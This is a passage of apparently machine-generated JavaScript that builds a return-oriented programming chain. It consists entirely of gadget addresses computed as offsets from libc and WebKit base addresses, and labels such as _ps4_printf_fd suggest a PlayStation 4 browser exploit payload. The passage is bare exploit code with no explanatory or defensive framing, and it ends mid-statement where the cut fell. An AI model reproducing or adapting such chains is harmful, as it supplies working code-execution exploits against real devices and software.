db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+567760, //L12597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12596: db([32, 0]); // 0x20 set_gadget(libc_base+759608,); //pop rax //L12597: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+567816, //L12598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12598: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12600: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12601: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12603: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+567992, //L12606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+567976, //L12604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12604: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12606: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+568080, //L12607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+568096, //L12609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12607: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12609: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12610: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov 
[rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L12612: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+568256, //L12615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+568240, //L12613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12613: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12615: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+568344, //L12616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+568360, //L12618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12616: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12618: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12619: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12622: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+568536, //L12625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+568520, //L12623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12623: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12625: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+568680, //L12628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+568648, //L12626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+568664, //L12627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+568760, //L12629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12629: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12631: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+568880, //L12634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+568864, //L12632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12632: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12634: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+569024, //L12637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+568992, //L12635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+569008, //L12636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12635: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12636: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12637: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12638: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12639: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L12640: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+569296, //L12642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+569312, //L12643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+569280, //L12641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12641: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12642: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12643: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+569408, //L12645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+569392, //L12644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12645: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+569504, //L12647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi 
]); //L12646: db([4294967272, 4294967295]); // -0x18 set_gadget(libc_base+759608,); //pop rax //L12647: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12648: ropchain+171056, //__out_fct libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12650: ropchain+569664, //L12649 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12649: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+569736, //L12651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12651: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12653: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L12655: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+569896, //L12658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+569880, //L12656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12656: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12658: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+570072, //L12661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570088, //L12662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+570040, //L12659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+570056, //L12660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12659: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12660: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12661: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12662: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+570168, //L12663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570184, //L12664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12663: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12664: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+570296, //L12665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570328, //L12667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+570312, //L12666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12665: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12666: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12667: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+764760, //pop rsi ropchain+570432, //L12668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570448, //L12669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12668: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12669: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+570568, //L12670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570552, //L12671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12671: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12670: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+570656, //L12673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+570640, //L12672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12672: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12673: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+570760, //L12674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570776, //L12675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12675: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+570896, //L12676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+570880, //L12677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12677: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12676: db([0, 0]); // 0x0 //__putchar: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+570968, //L12679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12679: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+571056, //L12680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+571104, //L12683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12680: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12681: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12682: db([0, 0]); // 0x0 set_gadget(webkit_base+568675,); //pop r8 //L12683: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+571200, //L12685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+571184, //L12684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12684: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12685: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+571336, //L12688 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+571304, //L12686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12686: db([0, 0]); // 0x0 set_gadgets([ libc_base+144605, //pop rdi //L12687: ropchain+136, //_ps4_printf_fd libc_base+759608 //pop rax ]); //L12688: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+571512, //L12691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+571528, //L12692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+571480, //L12689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+571496, //L12690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12689: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12690: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12691: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12692: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+571608, //L12693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+571624, //L12694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12693: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12694: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+571736, //L12695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+571768, //L12697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+571752, //L12696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12695: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12696: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12697: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+571944, //L12699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+571960, //L12700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+571928, //L12698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12698: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12699: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12700: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+572072, //L12702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+572120, //L12705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+572088, //L12703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12702: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12703: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12704: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12705: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al 
webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+572232, //L12706+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+572224, //L12706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L12706: db([0, 0]); // 0x0 set_gadgets([ ropchain+572248, //L12706+24 ropchain+573080, //L12701 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+572288, //L12707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12707: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12708: db([1, 0]); // 0x1 set_gadget(libc_base+144605,); //pop rdi //L12709: db([1, 0]); // 0x1 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+572416, //L12711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+572400, //L12710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12711: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+572512, //L12713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12712: db([16, 0]); // 0x10 set_gadget(libc_base+759608,); //pop rax //L12713: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+572656, //L12716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+572624, //L12714 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12714: db([0, 0]); // 0x0 set_gadgets([ libc_base+144605, //pop rdi //L12715: ropchain+136, //_ps4_printf_fd libc_base+759608 //pop rax ]); //L12716: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+572832, //L12719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+572848, //L12720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+572800, //L12717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+572816, //L12718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12717: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12719: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12720: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+572944, //L12722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+572928, //L12721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12721: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12722: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12724: ropchain+573048, //L12723 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+575512, //L12725 //L12723: libc_base+853989, //mov rax, rcx libc_base+764760 
//pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L12701: libc_base+764760, //pop rsi ropchain+573120, //L12726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12726: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12728: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+573240, //L12731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+573224, //L12729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12729: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12731: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+573400, //L12735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+573368, //L12733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+573384, //L12734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12732: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12733: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12734: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12735: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+573456, //L12737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12737: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+573584, //L12739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+573600, //L12740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+573568, //L12738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12738: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12739: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12740: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+573760, //L12744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+573728, //L12742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+573744, //L12743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12741: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12743: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12744: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+573816, //L12746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12746: db([0, 0]); // 0x0 set_gadgets([ 